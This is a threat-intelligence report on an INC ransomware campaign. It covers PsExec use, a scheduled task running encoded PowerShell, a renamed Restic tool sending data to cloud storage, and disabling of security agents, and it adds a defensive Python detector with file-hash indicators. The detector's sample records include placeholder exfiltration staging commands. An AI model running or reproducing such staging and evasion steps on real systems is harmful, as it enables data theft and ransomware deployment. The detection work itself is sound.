Huntress security researchers recently observed threat actors deploying INC ransomware after a multi-stage data theft operation. On February 25, 2026, attackers broke into a customer's system, stole private information, and then locked down the network.
The attackers used built-in Windows tools such as PowerShell and PsExec to stage the attack, gain higher access rights, and get around controls that could have detected the intrusion early. They went undetected in the early stages because the targeted organization did not have all of its security agents deployed and had no Security Information and Event Management (SIEM) system.

Data Exfiltration and Evasion Tactics

The attack sequence started on February 24, when the threat actor gained access to the target endpoint and mapped a network share. They quickly ran Microsoft's PsExec tool to give themselves more control over the system.
After that, the attackers set up a scheduled task called "Recovery Diagnostics" to run a malicious script. The task executed a base64-encoded PowerShell command that set environment variables for a cloud storage bucket. The attackers used a renamed copy of the open-source backup tool Restic, disguised as winupdate.exe so it would blend in with other system processes.
The script pointed to an S3 bucket hosted by Wasabi. It contained hardcoded credentials, and the password was simply the word "password." A follow-up command instructed the disguised Restic tool to back up specific files listed in a text file, effectively sending the data to the attacker's cloud infrastructure.
The attackers then systematically dismantled the endpoint's security defenses in preparation for the final ransomware deployment.

On February 25, they ran an executable to uninstall the VIPRE Business Agent; the regular uninstaller removed it successfully. They also turned off Real-Time Protection, which disabled Windows Defender. With the security controls removed from the environment, the threat actor launched the INC ransomware executable, disguised as win.exe.
It used the Windows RestartManager API to lock and encrypt files.

Signs of Attack and Incident Overlap

This kind of attack is not new; Huntress analysts saw very similar activity on February 9, earlier in the same month. The same actors used matching base64-encoded PowerShell commands to push a Restic configuration for data theft during that attack. The cloud storage access keys and the environment variables were identical in both attacks.
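As an added illustration, not code from Huntress or from the article, the following Python runs three defender-side checks over constructed telemetry records that mirror the staging and evasion steps described above: it decodes a PowerShell -EncodedCommand payload and flags assignments of the Restic and S3 environment variables, it spots Restic's backup syntax launched from a binary that is not named restic, and it picks out Microsoft Defender's real-time-protection-disabled event (event ID 5001). The record field names are an assumed normalised shape, and every path, key, bucket and password value is a constructed placeholder rather than an indicator from the incident.

```python
import base64
import re

# Constructed sample telemetry. Field names (type, image, cmdline, event_id,
# message) are an assumed normalised shape, not any vendor's schema; paths,
# keys and bucket names are placeholders, not indicators from the incident.

# Plaintext that a staging command like the one described would carry, before
# base64/UTF-16LE encoding for PowerShell's -EncodedCommand switch.
STAGING_SCRIPT = (
    '$env:AWS_ACCESS_KEY_ID="PLACEHOLDER_KEY_ID"; '
    '$env:AWS_SECRET_ACCESS_KEY="PLACEHOLDER_SECRET"; '
    '$env:RESTIC_PASSWORD="PLACEHOLDER_REPO_PASSWORD"; '
    '$env:RESTIC_REPOSITORY="s3:s3.example.invalid/bucket-placeholder"'
)


def encode_powershell(script):
    """Encode a script the way PowerShell -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": ('schtasks /create /tn "Recovery Diagnostics" /tr "powershell -enc '
                 + encode_powershell(STAGING_SCRIPT) + '" /sc once /st 03:00')},
    {"type": "process", "image": r"C:\ProgramData\winupdate.exe",
     "cmdline": r"C:\ProgramData\winupdate.exe backup --files-from C:\ProgramData\targets.txt"},
    {"type": "defender", "event_id": 5001, "message": "Real-time protection is disabled."},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# Variables a Restic-to-S3 staging script has to set; the names are Restic's
# and the AWS SDK's documented environment variables.
CLOUD_BACKUP_ENV = {"RESTIC_REPOSITORY", "RESTIC_PASSWORD",
                    "AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY"}

ENCODED_SWITCH = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
ENV_ASSIGNMENT = re.compile(r"\$env:([A-Za-z_][A-Za-z0-9_]*)\s*=", re.IGNORECASE)


def decode_encoded_powershell(cmdline):
    """Return the decoded script if cmdline carries an -EncodedCommand payload, else None."""
    match = ENCODED_SWITCH.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def cloud_backup_env_in_script(script):
    """Names from CLOUD_BACKUP_ENV that the script assigns via $env:, sorted."""
    assigned = {m.group(1).upper() for m in ENV_ASSIGNMENT.finditer(script)}
    return sorted(assigned & CLOUD_BACKUP_ENV)


def looks_like_renamed_restic(image, cmdline):
    """Heuristic: Restic's backup syntax run from a binary whose name does not say restic.

    A renamed copy keeps its command-line grammar, so the shape of the invocation
    (backup plus --files-from / -r / --repo) is a more durable signal than the
    file name. Hash or signer checks complement this; they do not replace it.
    """
    exe_name = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    tokens = cmdline.lower().split()
    restic_shape = "backup" in tokens and any(
        t in ("--files-from", "-r", "--repo") for t in tokens)
    return restic_shape and "restic" not in exe_name


def analyze(event):
    """Return a list of finding strings for one telemetry record (empty if nothing matched)."""
    findings = []
    if event["type"] == "process":
        cmdline = event["cmdline"]
        script = decode_encoded_powershell(cmdline)
        if script is not None:
            hits = cloud_backup_env_in_script(script)
            if hits:
                findings.append("encoded PowerShell sets cloud backup env vars: " + ", ".join(hits))
            if "schtasks" in event["image"].lower():
                findings.append("scheduled task created with an encoded PowerShell action")
        if looks_like_renamed_restic(event["image"], cmdline):
            findings.append("Restic-style backup run from a non-Restic binary name")
    elif event["type"] == "defender" and event["event_id"] == 5001:
        # Microsoft Defender Antivirus event 5001: real-time protection disabled.
        findings.append("Defender real-time protection disabled (event 5001)")
    return findings


def analyze_all(events):
    """(event index, finding) pairs across a batch, in order."""
    return [(i, f) for i, e in enumerate(events) for f in analyze(e)]


if __name__ == "__main__":
    for index, finding in analyze_all(SAMPLE_EVENTS):
        print(f"event {index}: {finding}")
```

Each check on its own is weak evidence (administrators do create scheduled tasks with encoded commands, and legitimate backup jobs do use Restic), which is why the findings are returned per record rather than turned into a single verdict: the value lies in correlating the staged backup, the renamed binary and the protection-disabled event on the same host within a short window, which is exactly the sequence the incident shows.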
In the earlier attack, the attackers used a program called HRSword to disable Acronis's security services, but quick response stopped the ransomware from being deployed. On January 22, 2026, the Cyber Centaurs team reported activity closely resembling what was seen with the INC ransomware infrastructure.
This further confirmed the pattern: the threat group follows a standard playbook built on renamed backup tools, hardcoded cloud credentials, and targeted removal of security tools. Organizations are advised to monitor their environments for the following indicators of compromise linked to the INC ransomware campaign:

Indicator              SHA256
C:\123\edr.exe         1d15b57db62c079fc6274f8ea02ce7ec3d6b158834b142f5345db14f16134f0d
c:\perflogs\win.exe    e034a4c00f168134900bfe235ff2f78daf8bfcfa8b594cd2dd563d43f5de1b13